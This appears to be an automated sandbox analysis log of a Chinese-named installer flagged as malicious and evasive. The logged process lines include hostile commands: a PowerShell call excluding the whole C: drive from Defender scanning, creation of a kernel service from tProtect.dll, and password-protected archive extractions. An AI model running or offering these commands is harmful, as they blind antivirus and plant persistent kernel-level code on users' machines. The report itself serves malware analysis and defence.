Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 0092FB10 appears 723 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2051170851.000000007EFEA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000000.2048989739.0000000000E09000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2050682545.000000000373E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal80.evad.winEXE@128/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C785D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C785D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00899313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00899313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_008A3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_008A3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00899252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00899252
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C785240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6C785240
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\is-P7QVT.tmp
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5484:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2920:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4564:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6584:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5588:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5616:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeFile created: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe"
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$20490,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$20490,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
